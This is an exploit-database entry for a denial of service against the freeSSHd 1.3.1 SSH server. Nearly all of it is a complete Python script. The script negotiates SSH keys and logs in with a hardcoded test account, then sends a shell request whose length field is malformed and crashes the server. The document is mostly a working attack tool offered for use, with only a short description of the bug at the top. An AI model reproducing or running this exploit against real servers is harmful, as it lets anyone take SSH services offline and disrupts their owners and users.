freeSSHd 1.3.1 - Denial of Service

EDB-ID:

38001

CVE:



Author:

3unnym00n

Type:

dos


Platform:

Windows

Date:

2015-08-28


'''
# Exploit title: freesshd 1.3.1 denial of service vulnerability
# Date: 28-8-2015
# Vendor homepage: http://www.freesshd.com
# Software Link: http://www.freesshd.com/freeSSHd.exe
# Version: 1.3.1
# Author: 3unnym00n
 
# Details:
# ----------------------------------------------
#           byte      SSH_MSG_CHANNEL_REQUEST
#           uint32    recipient channel
#           string    "shell"
#           boolean   want reply

# freeSSHd doesn't correctly handle channel shell request, when the "shell" length malformed can lead crashing
 
# Tested On: win7, xp
# operating steps: 
    1. in the freeSSHd settings: add a user, named "root", password is "fuckinA"
    2. restart the server to let the configuration take effect
    3. modify the hostname in this py.
    4. running the py, u will see the server crash
    
    
# remark: u can also modify the user auth service request packet, to adjust different user, different password

 
'''

import socket
import struct
import os
from StringIO import StringIO
from hashlib import sha1
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
from Crypto.Util import Counter
from hmac import HMAC

## suppose server accept our first dh kex: diffie-hellman-group14-sha1
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
G = 2
__sequence_number_out = 3

zero_byte = chr(0)
one_byte = chr(1)
four_byte = chr(4)
max_byte = chr(0xff)
cr_byte = chr(13)
linefeed_byte = chr(10)
crlf = cr_byte + linefeed_byte

class Message (object):
    """
    An SSH2 message is a stream of bytes that encodes some combination of
    strings, integers, bools, and infinite-precision integers (known in Python
    as longs).  This class builds or breaks down such a byte stream.

    Normally you don't need to deal with anything this low-level, but it's
    exposed for people implementing custom extensions, or features that
    paramiko doesn't support yet.
    """

    big_int = long(0xff000000)

    def __init__(self, content=None):
        """
        Create a new SSH2 message.

        :param str content:
            the byte stream to use as the message content (passed in only when
            decomposing a message).
        """
        if content is not None:
            self.packet = StringIO(content)
        else:
            self.packet = StringIO()

    def __str__(self):
        """
        Return the byte stream content of this message, as a string/bytes obj.
        """
        return self.asbytes()

    def __repr__(self):
        """
        Returns a string representation of this object, for debugging.
        """
        return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'

    def asbytes(self):
        """
        Return the byte stream content of this Message, as bytes.
        """
        return self.packet.getvalue()

    
    def add_bytes(self, b):
        """
        Write bytes to the stream, without any formatting.

        :param str b: bytes to add
        """
        self.packet.write(b)
        return self

    def add_byte(self, b):
        """
        Write a single byte to the stream, without any formatting.

        :param str b: byte to add
        """
        self.packet.write(b)
        return self

    def add_boolean(self, b):
        """
        Add a boolean value to the stream.

        :param bool b: boolean value to add
        """
        if b:
            self.packet.write(one_byte)
        else:
            self.packet.write(zero_byte)
        return self

    def add_size(self, n):
        """
        Add an integer to the stream.

        :param int n: integer to add
        """
        self.packet.write(struct.pack('>I', n))
        return self

    def add_int(self, n):
        """
        Add an integer to the stream.

        :param int n: integer to add
        """
        if n >= Message.big_int:
            self.packet.write(max_byte)
            self.add_string(deflate_long(n))
        else:
            self.packet.write(struct.pack('>I', n))
        return self

    def add_int(self, n):
        """
        Add an integer to the stream.

        @param n: integer to add
        @type n: int
        """
        if n >= Message.big_int:
            self.packet.write(max_byte)
            self.add_string(deflate_long(n))
        else:
            self.packet.write(struct.pack('>I', n))
        return self

    def add_int64(self, n):
        """
        Add a 64-bit int to the stream.

        :param long n: long int to add
        """
        self.packet.write(struct.pack('>Q', n))
        return self

    def add_mpint(self, z):
        """
        Add a long int to the stream, encoded as an infinite-precision
        integer.  This method only works on positive numbers.

        :param long z: long int to add
        """
        self.add_string(deflate_long(z))
        return self

    def add_string(self, s):
        """
        Add a string to the stream.

        :param str s: string to add
        """
        self.add_size(len(s))
        self.packet.write(s)
        return self

    def add_list(self, l):
        """
        Add a list of strings to the stream.  They are encoded identically to
        a single string of values separated by commas.  (Yes, really, that's
        how SSH2 does it.)

        :param list l: list of strings to add
        """
        self.add_string(','.join(l))
        return self

    def _add(self, i):
        if type(i) is bool:
            return self.add_boolean(i)
        elif isinstance(i, int):
            return self.add_int(i)
        elif type(i) is list:
            return self.add_list(i)
        else:
            return self.add_string(i)

    def add(self, *seq):
        """
        Add a sequence of items to the stream.  The values are encoded based
        on their type: str, int, bool, list, or long.

        .. warning::
            Longs are encoded non-deterministically.  Don't use this method.

        :param seq: the sequence of items
        """
        for item in seq:
            self._add(item)


def deflate_long(n, add_sign_padding=True):
    """turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""
    # after much testing, this algorithm was deemed to be the fastest
    s = bytes()
    n = long(n)
    while (n != 0) and (n != -1):
        s = struct.pack('>I', n & long(0xffffffff)) + s
        n >>= 32
    # strip off leading zeros, FFs
    for i in enumerate(s):
        if (n == 0) and (i[1] != chr(0)):
            break
        if (n == -1) and (i[1] != chr(0xff)):
            break
    else:
        # degenerate case, n was either 0 or -1
        i = (0,)
        if n == 0:
            s = chr(0)
        else:
            s = chr(0xff)
    s = s[i[0]:]
    if add_sign_padding:
        if (n == 0) and (ord(s[0]) >= 0x80):
            s = chr(0) + s
        if (n == -1) and (ord(s[0]) < 0x80):
            s = chr(0xff) + s
    return s

def inflate_long(s, always_positive=False):
    """turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""
    out = long(0)
    negative = 0
    if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
        negative = 1
    if len(s) % 4:
        filler = chr(0)
        if negative:
            filler = chr(0xff)
        # never convert this to ``s +=`` because this is a string, not a number
        # noinspection PyAugmentAssignment
        s = filler * (4 - len(s) % 4) + s
    for i in range(0, len(s), 4):
        out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]
    if negative:
        out -= (long(1) << (8 * len(s)))
    return out

def byte_mask(c, mask):
    return chr(ord(c) & mask)




def _compute_key(K, H, session_id, id, nbytes):
    """id is 'A' - 'F' for the various keys used by ssh"""
    m = Message()
    m.add_mpint(K)
    m.add_bytes(H)
    m.add_byte(str(id))
    m.add_bytes(session_id)
    out = sofar = sha1(m.asbytes()).digest()
    while len(out) < nbytes:
        m = Message()
        m.add_mpint(K)
        m.add_bytes(H)
        m.add_bytes(sofar)
        digest = sha1(m.asbytes()).digest()
        out += digest
        sofar += digest
    return out[:nbytes]


def compute_hmac(key, message, digest_class):
    return HMAC(key, message, digest_class).digest()


def read_msg(sock, block_engine_in, block_size, mac_size):
    header = sock.recv(block_size)
    header = block_engine_in.decrypt(header)
    packet_size = struct.unpack('>I', header[:4])[0]
    leftover = header[4:]
    buf = sock.recv(packet_size + mac_size - len(leftover))
    packet = buf[:packet_size - len(leftover)]
    post_packet = buf[packet_size - len(leftover):]
    packet = block_engine_in.decrypt(packet)
    packet = leftover + packet

def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):
    global __sequence_number_out
    out = block_engine_out.encrypt(raw_data)

    payload = struct.pack('>I', __sequence_number_out) + raw_data
    out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
    sock.send(out)
    __sequence_number_out += 1

def exploit(hostname, port):

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((hostname, port))

    ## send client banner
    client_banner = 'SSH-2.0-SUCK\r\n'
    sock.send(client_banner)
    ## recv server banner
    server_banner = ''
    while True:
        data = sock.recv(1)
        if data == '\x0a':
            break
        server_banner += data

    print 'server banner is: ', server_banner.__repr__()

    ## do key exchange
    ## send client algorithms
    cookie = os.urandom(16)


    client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')
    sock.send(client_kex)
    client_kex_init = client_kex[5:-5]


    ## recv server algorithms
    server_kex = ''
    str_pl = sock.recv(4)
    pl = struct.unpack('>I', str_pl)[0]
    tmp = sock.recv(pl)
    padding_len = ord(tmp[0])
    server_kex_init = tmp[1:-padding_len]

    ## do dh kex
    ## send client dh kex
    x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347
    e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639
    client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')
    sock.send(client_dh_kex)

    ## recv server dh kex
    str_pl = sock.recv(4)
    pl = struct.unpack('>I', str_pl)[0]
    server_dh_kex = sock.recv(pl)

    ## send client newkeys
    client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')
    sock.send(client_newkeys)

    ## recv server newkeys
    str_pl = sock.recv(4)
    pl = struct.unpack('>I', str_pl)[0]
    server_new_keys = sock.recv(pl)


    ## calc all we need ...
    host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]
    # print host_key_len
    host_key = server_dh_kex[6:6 + host_key_len]

    f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]
    str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]
    dh_server_f = inflate_long(str_f)

    sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 +  host_key_len + f_len])[0]
    sig = server_dh_kex[14 +  host_key_len + f_len:14 +  host_key_len + f_len + sig_len]

    K = pow(dh_server_f, x, P)
    ## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id
    hm = Message()

    hm.add(client_banner.rstrip(), server_banner.rstrip(),
           client_kex_init, server_kex_init)

    hm.add_string(host_key)
    hm.add_mpint(e)
    hm.add_mpint(dh_server_f)
    hm.add_mpint(K)

    H = sha1(hm.asbytes()).digest()

    ## suppose server accept our first cypher: aes128-ctr, hmac-sha1
    block_size = 16
    key_size = 16
    mac_size = 20

    IV_out = _compute_key(K, H, H, 'A', block_size)
    key_out = _compute_key(K, H, H, 'C', key_size)

    block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))
    mac_engine_out = sha1
    mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)

    IV_in = _compute_key(K, H, H, 'B', block_size)
    key_in = _compute_key(K, H, H, 'D', key_size)
    block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))
    mac_engine_in = sha1
    mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)

    ## do user auth
    ## send client service request (user auth)
    client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    ## encrypt the packet
    send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)


    ## recv server service accept
    read_msg(sock, block_engine_in, block_size, mac_size)

    ## send client userauth request
    client_userauth_request = '\x00\x00\x00\x3C\x08\x32'
    ## the user name length and username
    client_userauth_request += '\x00\x00\x00\x04'
    client_userauth_request += 'root'

    ## service
    client_userauth_request += '\x00\x00\x00\x0E'
    client_userauth_request += 'ssh-connection'

    ## password
    client_userauth_request += '\x00\x00\x00\x08'
    client_userauth_request += 'password'
    client_userauth_request += '\x00'

    ## plaintext password fuckinA
    client_userauth_request += '\x00\x00\x00\x07'
    client_userauth_request += 'fuckinA'

    ## padding
    client_userauth_request += '\x00'*8

    ## encrypt the packet
    print 'send client_userauth_request'
    send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
    # out = block_engine_out.encrypt(client_userauth_request)
    # payload = struct.pack('>I', __sequence_number_out) + client_userauth_request
    # out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
    # sock.send(out)


    ## recv server userauth success
    print 'recv  server userauth success'
    read_msg(sock, block_engine_in, block_size, mac_size)


    ## begin send malformed data
    ## send channel open
    client_channel_open = '\x00\x00\x00\x2c\x13\x5a\x00\x00\x00\x07session\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x80\x00' + '\x00'*0x13


    print 'send client_channel_open'
    send_msg(sock, client_channel_open, block_engine_out, mac_engine_out, mac_key_out, mac_size)

    ## recv channel open success
    # print 'recv channel open success'
    read_msg(sock, block_engine_in, block_size, mac_size)

    ## send client channel request
    client_channel_request = '\x00\x00\x00\x3c\x0d\x62\x00\x00\x00\x00\x00\x00\x00\x07pty-req\x01\x00\x00\x00\x05vt100\x00\x00\x00\x50\x00\x00\x00\x18' \
                             '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00'*0x0d


    print 'send client_channel_request'
    send_msg(sock, client_channel_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)

    ## recv server pty success
    # print 'recv server pty success'
    read_msg(sock, block_engine_in, block_size, mac_size)


    ## send client shell request
    client_shell_request = '\x00\x00\x00\x1c\x0c\x62\x00\x00\x00\x00'
    client_shell_request += '\x6a\x0b\xd8\xdashell'  # malformed
    client_shell_request += '\x01'
    client_shell_request += '\x00'*0x0c

    print 'send client_shell_request'
    send_msg(sock, client_shell_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
    # print 'recv server shell success'
    # read_msg(sock, block_engine_in, block_size, mac_size)



if __name__ == '__main__':

    hostname = '192.168.242.128'
    port = 22
    exploit(hostname, port)